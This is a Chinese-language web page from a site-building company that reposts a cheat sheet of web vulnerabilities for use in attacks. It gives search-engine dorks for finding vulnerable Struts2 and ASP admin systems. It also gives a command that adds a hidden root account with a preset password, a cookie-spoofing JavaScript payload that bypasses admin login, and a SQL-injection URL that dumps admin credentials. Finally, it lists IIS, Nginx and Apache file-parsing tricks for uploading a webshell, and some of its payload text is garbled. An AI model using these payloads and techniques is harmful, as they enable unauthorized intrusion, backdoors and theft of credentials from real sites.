我们专注攀枝花网站设计 攀枝花网站制作 攀枝花网站建设
成都网站建设公司服务热线:400-028-6601

网站建设知识

十年网站开发经验 + 多家企业客户 + 靠谱的建站团队

量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决

各种web程序漏洞


成都创新互联公司公司2013年成立,先为静海等服务建站,静海等地企业,进行企业商务咨询服务。为静海企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

收集整理的各种web漏洞

struts2:

Inurl:index.action

Inurl:商城.action

Inurl:index.action 标题:apache struts2

Inurl:action?id=

site:.com inurl:index.action

inurl:dhis-web-commons

利用工具操作,账号密码添加:

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0

账号:bingdao 

密码:1

生成加密密码详情:

以下为生成加密密码命令(第一个1就是密码):

echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin

生成的加密密码:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/

然后添加权限为root的账号和上面的密码:

useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/' 

就得到了账号为“lengyu”,密码为“1”的用户,然后再ssh上去

------------------------------------------------------

szwyadmin cookies欺骗:

inurl:szwyadmin/login.asp

inurl:szwyadmin

代码:

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

代码复制然后回车。。~ 方便快捷。。然后关闭网页重新打开后台地址,然后在地址栏中将login.asp改为admin_index.asp 就直接进入后台了,这种方法成功率百分之80以上。


另外这套程序还有一个爆密码的oday。

使用方法很简单。直接填写域名然后点击爆密码。~~~  直接射出管理员帐号密码。成功率不是很理想毕竟是很多的漏洞了.

-------------------------------------------------------------------------------------------------------------------------

南方数据:

inurl:HrDemand.asp

/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

admin/southidceditor/admin_style.asp

--------------------------------------------

爆库:

inurl:conn.asp

----------------

iis6 解析漏洞:

目录解析  /xx.asp/xx.jpg

说明:在网站下建立文件夹的名字为 .asp 或 .asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

文件解析  1.asp;.jpg 

说明:会被服务器看成是1.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种

/1.asa

/1.cer

/1.cdx

-----------------------------------

iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞:

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

在默认Fast-CGI开启状况下,黑阔上传一个名字为1.jpg,内容为

  ');?>

的文件,然后访问1.jpg/.php,在这个目录下就会生成一句话*** shell.php

------------------------------------------------------------------

Nginx <8.03 空字节代码执行漏洞:

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

来执行其中的代码

----------------
Apache 解析漏洞

        Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.

        如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

---------------------------------------------------

在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,***可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。

如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: 

SetHandler application/x-httpd-php

然后再上传shell.jpg的***, 这样shell.jpg就可解析为php文件


名称栏目:各种web程序漏洞
文章地址:http://mswzjz.cn/article/pochjp.html

其他资讯